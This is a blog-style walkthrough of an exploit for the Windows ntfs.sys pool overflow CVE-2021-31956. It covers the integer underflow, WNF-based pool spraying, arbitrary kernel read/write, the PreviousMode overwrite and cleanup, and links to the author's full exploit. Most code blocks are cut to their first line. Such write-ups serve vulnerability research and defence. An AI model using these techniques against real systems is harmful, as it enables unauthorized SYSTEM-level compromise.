Exploiting a paged pool overflow on Windows 10 to get system.
Introduction
In this post we’ll cover how to write an nday exploit for a Windows Kernel Pool overflow on a modern Windows 10 20H2 system, given an initial advisory, such as the one from Kaspersky regarding CVE-2021-31956 [1].
Advisory
The other vulnerability, CVE-2021-31956, is a heap-based buffer overflow in ntfs.sys. The function NtfsQueryEaUserEaList processes a list of extended attributes for the file and stores the retrieved values to buffer. This function is accessible via ntoskrnl syscall and among other things it’s possible to control the size of the output buffer. If the size of the extended attribute is not aligned, the function will calculate a padding and the next extended attribute will be stored 32-bit aligned. The code checks if the output buffer is long enough to fit the extended attribute with padding, but it doesn’t check for possible integer-underflow. As a result, a heap-based buffer overflow can happen.
1 | for ( cur_ea_list_entry = ea_list; ; cur_ea_list_entry = next_ea_list_entry ) |
The exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF) to create arbitrary memory read and write primitives. We are planning to publish more information about this technique in the future.
As the exploit uses CVE-2021-31955 to get the kernel address of the EPROCESS structure, it is able to use the common post exploitation technique to steal SYSTEM token. However, the exploit uses a rarely used “PreviousMode” technique instead.
Above is the original advisory released by Kaspersky, whose researchers first detected this vulnerability being exploited in the wild.
It contains a lot of information. The important points are:
- a heap-based buffer overflow in ntfs.sys
- function NtfsQueryEaUserEaList
- accessible via ntoskrnl syscall
- integer-underflow
- exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF)
- exploit uses a rarely used “PreviousMode” technique
Nicely commented pseudocode with meaningful names is also provided, which greatly eases the reverse engineering effort.
Armed with this information, let’s try to recreate the exploit.
Finding the syscall
The original advisory states that the bug can be triggered via an ntoskrnl syscall, which is available to usermode.
This will be our entry point for interacting with the kernel, so it’s important to find it first.
Browsing a website that documents syscalls [2], we find that the only two syscalls related to EAs (extended attributes) are NtQueryEaFile and NtSetEaFile.
Judging by the names, one probably allows us to set extended attributes on a file, and the other allows querying those attributes.
We can confirm this by breaking on NtfsQueryEaUserEaList in WinDbg, clicking around, and viewing the call stack once the breakpoint hits.
1 | 0: kd> g |
Indeed, the usermode API NtQueryEaFile eventually calls the vulnerable function.
Fortunately for us, the ZwQueryEaFile [3] and ZwSetEaFile [4] APIs are documented on MSDN.
Zw functions basically set the PreviousMode field in the _KTHREAD structure to 0 to indicate a call from kernel mode, so that usermode checks are skipped when the request is dispatched, and then call the corresponding Nt function.
Since each pair shares the same signature, the documented Zw prototypes can be used as the Nt prototypes.
Initial POC
1 | NTSTATUS ZwQueryEaFile( |
1 | NTSTATUS ZwSetEaFile( |
Reading the documentation reveals that both functions take a _FILE_FULL_EA_INFORMATION [5] or _FILE_GET_EA_INFORMATION [6] structure.
Both are non-circular singly linked lists, chained by the NextEntryOffset member. A _FILE_FULL_EA_INFORMATION entry stores an EaName and an EaValue separated by a null byte, while a _FILE_GET_EA_INFORMATION entry carries only the name.
Each entry should be 4-byte aligned [7].
An example of setting and querying two EAs on a file:
1 | HANDLE file = INVALID_HANDLE_VALUE; |
The calculation of NextEntryOffset is taken from the decompiled NtfsQueryEaUserEaList above: 0x9 bytes cover the fixed header fields (0x8) plus the null terminator after the name, and 0x3 is added so that the size rounds up rather than down when it is aligned to 0x4 bytes with a bitwise AND.
If we want an integer underflow, out_buf_length must be smaller than padding while the second EA entry is being processed.
The smallest out_buf_length we can achieve is 0x1, which happens when the size we specify is 1 byte larger than our first EA entry.
The largest padding we can achieve is 0x3.
Using the values in the code above, a name length of 0x3 and a value length of 0x9d make a total of 0xa0, which is 4-byte aligned. Adding 0x9 gives us 0xa9, which is one byte past a 4-byte boundary.
Rounding 0xa9 up to the next multiple of 0x4 gives 0xac, so our padding will be exactly 0x3 bytes.
Subtracting a value slightly larger than itself from the unsigned out_buf_length yields a huge unsigned value, which passes the length check and grants us a pool overflow with controlled size and controlled data.
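The arithmetic above can be checked in isolation. The following is a minimal sketch that mirrors the size, padding, and length-check expressions from the advisory pseudocode. The function names are my own, and nothing here touches the kernel.

```c
#include <assert.h>
#include <stdint.h>

/* Size the driver computes for one EA entry: 8 bytes of fixed header,
 * the name, 1 null terminator, and the value. */
static uint32_t ea_entry_size(uint8_t name_len, uint16_t value_len)
{
    return 9u + name_len + value_len;
}

/* Bytes needed to push the next entry onto a 4-byte boundary. */
static uint32_t ea_padding(uint32_t entry_size)
{
    assert(entry_size <= UINT32_MAX - 3u); /* the rounding itself must not wrap */
    return ((entry_size + 3u) & ~3u) - entry_size;
}

/* The length check from the advisory, done in unsigned 32-bit arithmetic.
 * When padding > out_buf_length the subtraction wraps to a huge value. */
static int ea_fits(uint32_t entry_size, uint32_t out_buf_length, uint32_t padding)
{
    return entry_size <= out_buf_length - padding;
}
```

With an output buffer of 0xaa bytes, the first entry (0xa9 bytes) leaves 0x1 byte, the padding is 0x3, and 0x1 - 0x3 wraps to 0xFFFFFFFE, so a second entry of any size passes ea_fits.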
The question now is whether the size of the pool allocation is exactly the size we pass in.
We can verify this in IDA by decompiling the caller of NtfsQueryEaUserEaList, which is NtfsCommonQueryEa.
1 | pool_buf = ExAllocatePoolWithTag((POOL_TYPE)(PoolType | 0x10), (unsigned int)size, 0x4546744Eu); |
If our assumptions are correct, r9 should point to a 0xc0-sized pool chunk (0xaa + 0x10 for the pool header, rounded up), and dword ptr [rsp+0x28] should contain the size 0xaa (0x28 because of the return address and the home space for the 4 register arguments).
1 | 1: kd> g |
And yes, we were right.
If we allow the code to continue, it will certainly corrupt the pool chunk after ours, and likely crash the whole system.
We have to first “prepare” the pool to accept an overflow, so it’s predictable to us.
WNF
Before starting the exploitation steps, I’ll need to digress a little and talk about the Windows Notification Facility (WNF).
If you want a proper explanation regarding WNF and not my hacky garbage, check out this talk at Black Hat [8] and this blogpost by Gabrielle Viala [9].
Essentially, WNF is a Windows feature that lets applications deal with notifications.
For example, when an application has to wait on an event before continuing, but the event does not exist yet, it can use WNF to monitor for that event.
Like all Windows features, it is essentially a bunch of structures in the kernel.
WNF has two main structures of interest, _WNF_NAME_INSTANCE and _WNF_STATE_DATA.
1 | //0xa8 bytes (sizeof) |
1 | //0x10 bytes (sizeof) |
We can create a name instance using the NtCreateWnfStateName API.
1 | typedef NTSTATUS(NTAPI *NCWSN)( |
This returns a StateName to usermode, which we can use to reference this particular name instance.
By passing this statename to the NtUpdateWnfStateData function, a _WNF_STATE_DATA structure is created.
The StateData member (offset 0x58) of the name instance points to this statedata structure.
1 | typedef NTSTATUS(NTAPI *NUWSD)( |
The Length argument we pass is used to populate the AllocatedSize and DataSize of the _WNF_STATE_DATA structure, where AllocatedSize defines how much we can write, and DataSize defines how much we can read.
1 | StateData = 0i64; |
The simplified pseudocode above for ExpWnfWriteStateData shows that if StateData.AllocatedSize < Length, a new buffer is allocated in the paged pool (controllable length again!). The new buffer is 0x10 bytes larger than Length, because a _WNF_STATE_DATA header sits in front of the actual data.
Otherwise, if AllocatedSize >= Length, the data is copied into the existing buffer, DataSize (the read size) is set to Length, and ChangeStamp is updated accordingly.
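To make the two branches concrete, here is a small usermode model of the write path. It is only a sketch of the behaviour described above, not the kernel code: the function names are mine, malloc stands in for the paged pool, and bumping ChangeStamp by one per write is a simplification.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Layout of _WNF_STATE_DATA (0x10 bytes). The payload follows it directly. */
typedef struct {
    uint32_t Header;        /* node type and size, opaque in this model */
    uint32_t AllocatedSize; /* how many payload bytes may be written */
    uint32_t DataSize;      /* how many payload bytes may be read */
    uint32_t ChangeStamp;
} wnf_state_data;

static_assert(sizeof(wnf_state_data) == 0x10, "header must be 0x10 bytes");

/* *slot plays the role of the name instance's StateData pointer.
 * Returns 0 on success, -1 if the allocation fails. */
static int model_write_state_data(wnf_state_data **slot, const void *buf, uint32_t length)
{
    wnf_state_data *sd = *slot;
    if (sd == NULL || sd->AllocatedSize < length) {
        /* Too small: allocate header + Length bytes and drop the old buffer. */
        wnf_state_data *fresh = malloc(sizeof(*fresh) + length);
        if (fresh == NULL)
            return -1;
        fresh->Header = 0;
        fresh->AllocatedSize = length;
        fresh->DataSize = 0;
        fresh->ChangeStamp = sd ? sd->ChangeStamp : 0;
        free(sd);
        *slot = sd = fresh;
    }
    if (length != 0)
        memcpy(sd + 1, buf, length);  /* payload sits right after the header */
    sd->DataSize = length;            /* read size follows the last write */
    sd->ChangeStamp++;                /* simplified stamp update */
    return 0;
}

/* Usage: a second, smaller write reuses the first buffer. Returns 1 if so. */
static int demo_write_reuses_buffer(void)
{
    wnf_state_data *sd = NULL;
    if (model_write_state_data(&sd, "AAAAAAAA", 8) != 0)
        return 0;
    wnf_state_data *first = sd;
    if (model_write_state_data(&sd, "BB", 2) != 0) {
        free(sd);
        return 0;
    }
    int ok = sd == first && sd->AllocatedSize == 8 && sd->DataSize == 2 &&
             sd->ChangeStamp == 2 && memcmp(sd + 1, "BB", 2) == 0;
    free(sd);
    return ok;
}
```

The point to take away is that AllocatedSize never shrinks on the reuse path, which is why corrupting it later gives us a write past the end of the chunk.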
We can read the data back with NtQueryWnfStateData:
1 | typedef NTSTATUS(NTAPI *NQWSD)( |
1 | *ChangeStamp = *(_DWORD *)(*(_QWORD *)&StateData + 0xCi64); |
As shown in the simplified pseudocode for ExpWnfReadStateData, BufferSize and ChangeStamp are populated with whatever is at StateData+0x8 and StateData+0xC respectively. Then the data is copied back to usermode.
Finally, we can free both allocations with NtDeleteWnfStateData and NtDeleteWnfStateName.
All in all, using both of these structures together gives us a really good read/write primitive.
The _WNF_NAME_INSTANCE structure occupies a 0xc0-sized chunk in the paged pool. That’s why I chose the overflow chunk in the previous section to also be 0xc0 sized.
The size of the _WNF_STATE_DATA structure can be controlled through the Length we pass to NtUpdateWnfStateData.
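The size matching can be sanity-checked with a few lines of arithmetic. This sketch assumes a 0x10-byte pool header and 0x10-byte size granularity for small allocations, which matches the 0xaa to 0xc0 rounding seen earlier. The helper names and the 0xa0 payload length are my own choices for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define POOL_HEADER_SIZE    0x10u /* pool header in front of every chunk */
#define POOL_GRANULARITY    0x10u /* assumed rounding for small chunks */
#define WNF_STATE_DATA_SIZE 0x10u /* _WNF_STATE_DATA header before the payload */

static_assert((POOL_GRANULARITY & (POOL_GRANULARITY - 1u)) == 0,
              "granularity must be a power of two");

/* Chunk size for a requested allocation size: add the header, round up. */
static uint32_t pool_chunk_size(uint32_t requested)
{
    return (requested + POOL_HEADER_SIZE + POOL_GRANULARITY - 1u) &
           ~(POOL_GRANULARITY - 1u);
}

/* Chunk size of the statedata created by an update of `length` bytes. */
static uint32_t wnf_state_data_chunk_size(uint32_t length)
{
    return pool_chunk_size(length + WNF_STATE_DATA_SIZE);
}
```

Under these assumptions the 0xaa-byte Ntfs buffer, the 0xa8-byte _WNF_NAME_INSTANCE, and a statedata with a 0xa0-byte payload all end up as 0xc0-sized chunks.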
Exploitation Outline
The idea is to get our overflowing Ntfs buffer from earlier placed right before a _WNF_STATE_DATA chunk in memory.
By overwriting its AllocatedSize and DataSize, we gain a large relative read/write over the pool memory that follows this chunk.
We can use this to find a nearby _WNF_NAME_INSTANCE chunk, and locate its StateName.
With the StateName, we can now query the _WNF_STATE_DATA associated with this name instance (remember that the statename is a reference to the name instance).
Using our write ability, we update the StateData pointer of the name instance to point anywhere in memory.
As long as the AllocatedSize and DataSize of our rogue _WNF_STATE_DATA are sane, we can read/write anywhere in memory.
Heap Spray
The kernel is active, and thousands of allocations and deallocations are happening all the time.
The only way to maximize our chances of having the Ntfs buffer placed before a _WNF_STATE_DATA buffer is to create tens of thousands of statedata buffers in the paged pool.
1 | for (int i = 0; i < count; i++) { |
This process is known as Heap Spraying.
Then we free roughly one third of the chunks.
1 | for (int i = 0; i < count; i += 3) { |
If we think of the pool full of WNF structures as a big block of cheese, there are now thousands of holes in the cheese.
Many of these will be taken up by other 0xc0-sized structures, allocated by other processes or even the kernel itself.
However, if we are lucky (and if we spray enough), our buffer should land right in the middle of a bunch of WNF structures.
1 | 1: kd> !pool @r9 |
The WNF Problem
The approach above has a pretty big problem: we do not know whether we overflowed a _WNF_STATE_DATA chunk or a _WNF_NAME_INSTANCE chunk, since both are 0xc0 sized.
Blindly assuming one or the other can greatly reduce the success rate.
If we inspect both structures, we can see that the ChangeStamp member of the statedata is returned to usermode on a query.
This means that if we carefully limit the overflow to 0x20 bytes (pool header + up to ChangeStamp), we can query all statedata chunks to verify whether we actually overflowed a statedata chunk.
If we did not, the overflow only corrupts the Header and RunRef fields of a nameinstance chunk, which is OK for now. We can fix that at the end of the exploit. We will just have to attempt the overflow again.
1 | do { |
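The 0x20-byte overflow described in this section can be laid out as follows. This is a sketch under assumptions, not the code from my exploit: the marker value, the helper names, and the header and size values passed in the demo are placeholders, and the pool header bytes are treated as opaque input that the caller must supply.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define POOL_HEADER_SIZE 0x10u
#define OVERFLOW_SIZE    0x20u   /* pool header + _WNF_STATE_DATA header */
#define MARKER_STAMP     0xcafeu /* hypothetical ChangeStamp marker */

typedef struct {
    uint32_t Header;
    uint32_t AllocatedSize;
    uint32_t DataSize;
    uint32_t ChangeStamp;
} wnf_state_data;

static_assert(sizeof(wnf_state_data) == 0x10, "header must be 0x10 bytes");

/* Builds the bytes that land on the chunk following the Ntfs buffer. */
static void build_overflow(uint8_t out[OVERFLOW_SIZE],
                           const uint8_t pool_header[POOL_HEADER_SIZE],
                           uint32_t wnf_header, uint32_t new_size)
{
    wnf_state_data sd = { wnf_header, new_size, new_size, MARKER_STAMP };
    memcpy(out, pool_header, POOL_HEADER_SIZE);
    memcpy(out + POOL_HEADER_SIZE, &sd, sizeof(sd));
}

/* After the overflow, query every sprayed state name: only a corrupted
 * _WNF_STATE_DATA reports the marker as its ChangeStamp. */
static int is_corrupted_state_data(uint32_t queried_change_stamp)
{
    return queried_change_stamp == MARKER_STAMP;
}

/* Usage: the marker ends up at offset 0x1c of the payload. Returns 1 if so. */
static int demo_overflow_payload(void)
{
    uint8_t pool_header[POOL_HEADER_SIZE] = { 0 }; /* placeholder bytes */
    uint8_t payload[OVERFLOW_SIZE];
    uint32_t stamp;
    /* 0x100904 and 0xff8 are placeholder arguments for this demo. */
    build_overflow(payload, pool_header, 0x100904u, 0xff8u);
    memcpy(&stamp, payload + 0x1c, sizeof(stamp));
    return is_corrupted_state_data(stamp);
}
```

If the neighbour turns out to be a name instance instead, the same 0x10 bytes after the pool header fall on its Header and RunRef fields, which is the damage repaired during cleanup.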
Enumerating _KTHREADS
Now, assuming our attack succeeded and we gained arbitrary read/write, where should we write?
Of course, we could directly NULL out the current process’s ACL or steal a system token, but to emulate the adversary, I think we should perform the PreviousMode attack.
More about PreviousMode in the next section. For now, just know it’s a field in the _KTHREAD structure, which is reachable through the _KPROCESS structure’s ThreadListHead member, and that _KPROCESS shares its address with _EPROCESS.
In order to increase the success rate of our attack, we should perform the attack on all _KTHREADs present in the process.
With our arbitrary read, we first read the Blink of the ThreadListHead member, the backward link of the circular doubly linked LIST_ENTRY.
This Blink points to the ThreadListEntry field of the first _KTHREAD we visit, so we subtract 0x2f8 to find that _KTHREAD’s address.
1 | threadlisthead = (ULONG_PTR)((ULONG_PTR)own_eproc + (ULONG_PTR)0x30); |
A few points about the code above need explaining.
Firstly, we XOR the leaked statename with the statename constant 0x41C64E6DA3BC0074. The reason is that the statename returned to usermode is not the actual statename stored in kernel memory.
Then we point the StateData at the ThreadListHead member and attempt a query.
This query will fail, because we don’t have sane size fields near there. Even if we did, we wouldn’t know how big a buffer to pass, because the read operation demands a buffer size that matches the DataSize member.
However, recall from the WNF section above that the ChangeStamp and BufferSize fields are still populated with the values at that memory location.
In this case, together they form the Blink value.
(Fun fact, I made a mistake by naming them flink in my actual exploit lmao.)
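The two calculations from this section, the statename XOR and the Blink reconstruction, fit in a few lines. This is a sketch with names of my own choosing. It assumes StateData was pointed at ThreadListHead, so that the dword at +0x8 (returned as BufferSize) is the low half of Blink and the dword at +0xC (returned as ChangeStamp) is the high half.

```c
#include <assert.h>
#include <stdint.h>

#define WNF_STATE_KEY           0x41C64E6DA3BC0074ULL /* constant from this post */
#define KTHREAD_THREADLISTENTRY 0x2f8u                /* offset from this post */

/* XOR is its own inverse, so one helper converts in both directions between
 * the usermode statename and the one stored in kernel memory. */
static uint64_t wnf_toggle_statename(uint64_t name)
{
    return name ^ WNF_STATE_KEY;
}

/* Rebuilds the 64-bit Blink from the two dwords the failed query hands back. */
static uint64_t blink_from_query(uint32_t buffer_size, uint32_t change_stamp)
{
    return ((uint64_t)change_stamp << 32) | buffer_size;
}

/* Converts a ThreadListEntry address into the owning _KTHREAD address. */
static uint64_t kthread_from_list_entry(uint64_t entry)
{
    assert(entry >= KTHREAD_THREADLISTENTRY);
    return entry - KTHREAD_THREADLISTENTRY;
}
```

For example, a query that returns BufferSize 0x123452f8 and ChangeStamp 0xffff8001 describes a list entry at 0xffff8001123452f8, which belongs to a _KTHREAD at 0xffff800112345000.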
You may ask how I found my own _KPROCESS address in the first place.
I used a well-known trick with the NtQuerySystemInformation API (also used in my Exploiting Inherited Handles blog) to leak the kernel addresses of handles.
However, we can also read the CreatorProcess field of _WNF_NAME_INSTANCE to leak the _KPROCESS of our current process, in case the API gets patched in future releases.
From here, we can traverse the list and enumerate all _KTHREADs.
1 | for (int i = 1; i < MAX_THREAD_SEARCH; i++) { |
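The traversal logic is easier to see on an ordinary in-process list. The sketch below walks a circular doubly linked list backwards through Blink and recovers each containing structure by subtracting the member offset. The fake_kthread type and all helper names are made up for the demo. In the real exploit every pointer dereference is replaced by one WNF-based arbitrary read.

```c
#include <assert.h>
#include <stddef.h>

typedef struct list_entry {
    struct list_entry *Flink;
    struct list_entry *Blink;
} list_entry;

/* Stand-in for _KTHREAD: only the list linkage matters here. */
typedef struct {
    int id;
    char PreviousMode;
    list_entry ThreadListEntry;
} fake_kthread;

#define CONTAINER_OF(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

static void list_init(list_entry *head)
{
    head->Flink = head->Blink = head;
}

static void list_insert_tail(list_entry *head, list_entry *e)
{
    e->Flink = head;
    e->Blink = head->Blink;
    head->Blink->Flink = e;
    head->Blink = e;
}

/* Follows Blink until we are back at the head. Returns the number found. */
static size_t enumerate_threads(list_entry *head, fake_kthread **out, size_t max)
{
    assert(head != NULL && out != NULL);
    size_t n = 0;
    for (list_entry *e = head->Blink; e != head && n < max; e = e->Blink)
        out[n++] = CONTAINER_OF(e, fake_kthread, ThreadListEntry);
    return n;
}

/* Usage: three threads are found in reverse insertion order. */
static int demo_enumerate(void)
{
    list_entry head;
    fake_kthread t[3];
    fake_kthread *found[8];
    list_init(&head);
    for (int i = 0; i < 3; i++) {
        t[i].id = i;
        t[i].PreviousMode = 1;
        list_insert_tail(&head, &t[i].ThreadListEntry);
    }
    size_t n = enumerate_threads(&head, found, 8);
    return n == 3 && found[0]->id == 2 && found[1]->id == 1 && found[2]->id == 0;
}
```

Stopping when the walk returns to the list head is what keeps the enumeration from looping forever on a circular list.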
Once we find all the threads, we can perform the PreviousMode Attack on all of them.
PreviousMode Attack
PreviousMode is a one-byte member of the _KTHREAD structure.
It’s used when kernel APIs (those implemented in ntoskrnl.exe that share a name with user APIs in ntdll.dll) perform validation.
UserMode has a value of 1, and KernelMode has a value of 0.
When an API request is serviced, security checks will be invoked based on the PreviousMode.
For example, memory boundary checking is enforced if PreviousMode is set to 1 for the NtReadVirtualMemory API to make sure usermode threads cannot read kernel data.
However if PreviousMode is set to 0, the system will gladly skip all checks and assume you are running as a kernel driver.
This is great news for us as exploit writers.
By nulling out the PreviousMode byte, we can achieve real and hassle-free arbitrary read/write using Windows APIs.
1 | for (int i = 0; i < MAX_THREAD_SEARCH; i++) { |
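Why a single byte matters so much can be shown with a toy model of the boundary check. This is not the kernel's code, only a rough sketch of the idea: the function name is mine, and the probe limit is the usual x64 user probe address, used here as an assumption.

```c
#include <assert.h>
#include <stdint.h>

enum { KERNEL_MODE = 0, USER_MODE = 1 };

static_assert(KERNEL_MODE == 0 && USER_MODE == 1, "values as described in the post");

#define MM_USER_PROBE_ADDRESS 0x7FFFFFFF0000ULL /* assumed x64 user/kernel split */

/* Returns 1 if a read of `size` bytes at `address` would be allowed. */
static int model_probe_for_read(uint8_t previous_mode, uint64_t address, uint64_t size)
{
    if (previous_mode == KERNEL_MODE)
        return 1;                      /* trusted caller: no boundary check */
    if (size > UINT64_MAX - address)
        return 0;                      /* range wraps around */
    return address + size <= MM_USER_PROBE_ADDRESS;
}
```

With PreviousMode set to 1, a kernel address such as 0xffff800000001000 is rejected. With PreviousMode set to 0, the same request passes without any check.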
Clean Up
Stealing the token and spawning a shell are pretty straightforward, so I’ll skip to cleanup.
There are a few things we have to clean up.
While trying to overflow statedata chunks, we might have set the RunRef member of a nameinstance chunk to an invalid value.
This can lead to a crash when the system uses this field.
Since it’s a reference counter, we can fix it by setting it to 0.
We can find all our nameinstance blocks by accessing the WnfContext field of our _EPROCESS and traversing the linked list.
1 | NTSTATUS fix_runrefs(_In_ PWNF_PROCESS_CONTEXT ctx) |
Next, we’ll have to set the PreviousMode of all _KTHREADs back to 1, because we don’t know which ones were set to 1 before.
Even if we set an actual kernel thread’s PreviousMode to 1, it should still be fine, because kernel code is supposed to call the Zw version of functions, which still bypasses the checks.
Finally, we have to restore the StateData pointer of our corrupted nameinstance chunk.
1 | if (!NT_SUCCESS(fix_runrefs(ctx))) |
And now we can happily spawn a system shell with the system still stable, unless the heap spray failed and we accidentally overwrote some data structure other than the WNF structures.
Conclusion
You can find my full exploit here:
https://github.com/Y3A/CVE-2021-31956
Abusing WNF structures was new to me, but I’m impressed by its flexible read/write capabilities.
Furthermore, it’s a paged pool gadget, which is quite rare (normally you hear about people exploiting the non-paged pool more).
I’m pretty convinced that kernel exploitation is mostly about “who has more super secret undocumented gadgets of varying sizes to use in both pools”.
Without standing on the shoulders of the references listed below, there’s no way I could have figured all of this out in a reasonable amount of time.
All respects to vuln/system researchers!
Update
A reader reported that he was unable to call the WNF APIs from a low-privilege context (e.g. the Chrome sandbox).
My exploit here does not take that into consideration, but as mentioned by @k0shl in a tweet, it’s absolutely possible to launch the exploit from a sandbox.
Ad verbum:
“Well, this depends on the SecurityDescriptor parameter of NtCreateWnfStateName and NtUpdateWnfStateData, in the sandboxed situation, you should invoke NtQuerySecurityObject from process token and get a SD which can be accessed by sandboxed process, and pass it to WNF API”
His code to achieve this:
1 | BOOLEAN AllocateWnfObject(DWORD dwWantedSize, PWNF_STATE_NAME pStateName) { |
References
[1] https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/
[2] https://hfiref0x.github.io/syscalls.html
[3] https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-zwqueryeafile
[4] https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-zwseteafile
[5] https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_file_full_ea_information
[6] https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/ns-ntifs-_file_get_ea_information
[7] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/0eb94f48-6aac-41df-a878-79f4dcfd8989
[8] https://www.youtube.com/watch?v=MybmgE95weo
[9] https://blog.quarkslab.com/playing-with-the-windows-notification-facility-wnf.html